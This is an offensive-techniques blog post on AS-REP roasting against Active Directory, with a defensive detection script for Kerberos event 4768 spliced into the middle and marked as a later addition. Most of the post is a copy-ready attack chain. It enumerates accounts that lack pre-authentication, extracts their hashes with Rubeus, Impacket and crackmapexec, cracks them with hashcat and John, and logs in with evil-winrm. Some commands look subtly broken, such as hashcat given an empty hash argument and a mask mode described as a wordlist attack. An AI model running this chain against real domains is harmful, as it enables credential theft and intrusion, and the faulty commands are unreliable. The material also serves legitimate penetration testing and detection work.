Effective URL: https://pentestlab.blog/2024/02/20/as-rep-roasting/
Penetration Testing Lab

Offensive Techniques & Methodologies

Posted on February 20, 2024


AS-REP ROASTING

by Administrator, in Credential Access.

Active Directory users that have Kerberos pre-authentication enabled and
require access to a resource initiate the Kerberos authentication process by
sending an Authentication Server Request (AS-REQ) message to the domain
controller. The timestamp in that message is encrypted with the hash of the
user's password. The domain controller decrypts the timestamp using its own
record of the user's password hash and sends back an Authentication Server
Response (AS-REP) that contains a TGT (Ticket Granting Ticket) issued by the Key
Distribution Center, which will be used for any future access requests by the
user.

Any user in the domain that has Kerberos pre-authentication disabled enables
red teams to request authentication data for that user from Active Directory,
forcing the domain controller to return an AS-REP message that is encrypted
with the password hash of the user. Through offline cracking, the password of
the user can be retrieved and used for lateral movement. Even though the option
"Do not require Kerberos pre-authentication" is not enabled by default, some
Active Directory accounts, such as service accounts, might have that option
enabled for compatibility reasons, i.e. to allow specific applications to work
properly, since some applications do not support Kerberos pre-authentication.

Specifically, Kerberos pre-authentication requires the user to supply its
secret key, which is derived from its password, as a verification step before
any TGT is issued by the Key Distribution Center (KDC). The ticket granting
ticket is sent to the user in the KRB_AS_REP message, which also contains the
session key. When Kerberos pre-authentication is disabled, a user in the network
can skip this verification and request TGTs whose encrypted part, containing the
session key, can be subjected to offline cracking.

Kerberos Pre-authentication


ENUMERATION

In order to conduct the AS-REP Roasting technique, the vulnerable accounts need
to be enumerated. ADSearch is a tool that can perform LDAP queries in order to
enumerate Active Directory objects. The filter sAMAccountType=805306368
matches only Active Directory user accounts and not computer accounts or
groups. The filter userAccountControl:1.2.840.113556.1.4.803:=4194304 matches
the users that have the setting "Do not require Kerberos pre-authentication"
enabled.

dotnet inline-execute /home/kali/ADSearch.exe --search "(&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

AS-REP Roasting – ADSearch

It is also feasible to identify accounts vulnerable to AS-REP roasting from a
non-domain-joined system using the Impacket module GetNPUsers.

impacket-GetNPUsers -dc-ip 10.0.0.1 -ts  red.lab/peter:Password123

AS-REP Roasting – Impacket Authenticated


AS-REP

The AS-REP Roasting technique has been implemented in the Rubeus tool under the
asreproast action. Rubeus will identify all accounts in the domain that do not
require Kerberos pre-authentication and extract their AS-REP hashes.

dotnet inline-execute /home/kali/Rubeus.exe asreproast

AS-REP Roasting – Rubeus over C2

.\Rubeus.exe asreproast

AS-REP Roasting – Rubeus

It is also feasible to conduct the AS-REP Roasting technique from a
non-domain-joined system and from an unauthenticated perspective with the
GetNPUsers module from the Impacket suite. Supplying a list of Active Directory
usernames against the domain controller will retrieve the Kerberos
authentication response (AS-REP) hashes of the vulnerable accounts.

impacket-GetNPUsers -no-pass -usersfile usernames.txt -dc-ip 10.0.0.1 red.lab/

AS-REP Roasting – Impacket No Pass

impacket-GetNPUsers -usersfile /home/kali/Desktop/usernames.txt -request -dc-ip 10.0.0.1 "red.lab/"

AS-REP Roasting – Impacket

Execution of the command below will authenticate against the domain controller
and format the AS-REP hash so it can be used by John the Ripper. The pattern
must be single-quoted, otherwise the shell expands the "$" characters before
grep sees them.

impacket-GetNPUsers red.lab/peter:Password123 -request -format john | grep '$krb5asrep$'

AS-REP Roasting – Impacket John The Ripper Format

Alternatively, crackmapexec can also perform the AS-REP Roasting technique from
an authenticated or unauthenticated context.

crackmapexec ldap -dc-ip 10.0.0.1 -u usernames.txt -p '' --asreproast asreproast.out

AS-REP Roasting – Crackmapexec Unauthenticated

crackmapexec ldap 10.0.0.1 -u 'peter' -p 'Password123' --asreproast ./hash.asrep

crackmapexec ldap -dc-ip 10.0.0.1 -u usernames.txt -p 'Password123' --asreproast asreproast.out

AS-REP Roasting – Crackmapexec
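From the defender's side, every tool in this section leaves the same trace on the domain controller: a Kerberos TGT request (Security event 4768) with pre-authentication type 0 and, because the tools ask for the crackable etype 23 described below, ticket encryption type 0x17. The following detection logic is an added example, not code from the original post; it runs over a constructed, flattened key=value rendering of 4768 events (real events are EVTX/XML, so the field extraction would differ) and the per-source sweep threshold is an assumed heuristic for a username-list run such as GetNPUsers -usersfile.

```python
import re
from collections import defaultdict

# Constructed sample of Security event 4768 fields, flattened to key=value
# (only the fields relevant to AS-REP roasting are kept).
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=peter PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.50 Status=0x0
EventID=4768 TargetUserName=svc_backup PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.99 Status=0x0
EventID=4768 TargetUserName=svc_legacy PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.99 Status=0x0
EventID=4768 TargetUserName=alice PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.99 Status=0x6
EventID=4768 TargetUserName=svc_legacy PreAuthType=0 TicketEncryptionType=0x12 IpAddress=10.0.0.7 Status=0x0
EventID=4769 TargetUserName=peter PreAuthType=- TicketEncryptionType=0x12 IpAddress=10.0.0.50 Status=0x0
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened event line into a dict of field -> value."""
    return dict(FIELD_RE.findall(line))


def is_asrep_roast_candidate(ev, etypes=("0x17",)):
    """A successfully issued TGT (4768, Status 0x0) with no pre-authentication
    (PreAuthType 0) and an RC4 session key (etype 0x17 = 23, the hashcat
    18200 / john krb5asrep format). AES replies (0x12) are not flagged by
    default; widen `etypes` to review them as well."""
    return (ev.get("EventID") == "4768"
            and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType", "").lower() in etypes)


def find_roasting(events_text, sweep_threshold=2):
    """Return (flagged events, {source IP: accounts}) where one source obtained
    roastable AS-REPs for at least `sweep_threshold` distinct accounts.
    The threshold is an assumed heuristic for a username-list sweep; a single
    hit may just be the legacy application the account was exempted for."""
    flagged = [ev for ev in map(parse_event, events_text.splitlines())
               if is_asrep_roast_candidate(ev)]
    by_source = defaultdict(set)
    for ev in flagged:
        by_source[ev["IpAddress"]].add(ev["TargetUserName"])
    sweeps = {ip: sorted(users) for ip, users in by_source.items()
              if len(users) >= sweep_threshold}
    return flagged, sweeps


if __name__ == "__main__":
    hits, sweeps = find_roasting(SAMPLE_EVENTS)
    for ev in hits:
        print("roastable AS-REP:", ev["TargetUserName"], "from", ev["IpAddress"])
    print("username sweeps by source:", sweeps)
```

Accounts that appear in the flagged list are the ones to review for the "Do not require Kerberos pre-authentication" flag, whether the exemption is still needed, and whether their passwords are long enough to survive the offline cracking described in the next section.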


OFFLINE CRACKING

Once the hash has been retrieved, it can be cracked using hashcat. Since the
hash is Kerberos 5 AS-REP etype 23, the associated hash mode for this type of
encryption is 18200. Attack mode 3 conducts a mask attack against the given
wordlist. Specifically, hashcat will attempt to crack the hash by trying all
characters from the given charsets per position.

hashcat -m18200 '' -a 3 /usr/share/wordlists/rockyou.txt

AS-REP Roasting – Hashcat

If the password is not sufficiently strong, hashcat will crack the password.

AS-REP Roasting – Hashcat Password

Alternatively, John the Ripper can be used to crack Kerberos 5 AS-REP hashes.
The hash is written into a file called hash.asrep.

AS-REP Roasting – Hash

Executing the following command will attempt to crack the password hash.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep /home/kali/hash.asrep

AS-REP Roasting – John the Ripper


LATERAL MOVEMENT

If the account is privileged, the cracked password can be used to authenticate
to the target system using evil-winrm.

evil-winrm -u Administrator -p Password123 -i @10.0.0.1

AS-REP Roasting – Lateral Movement
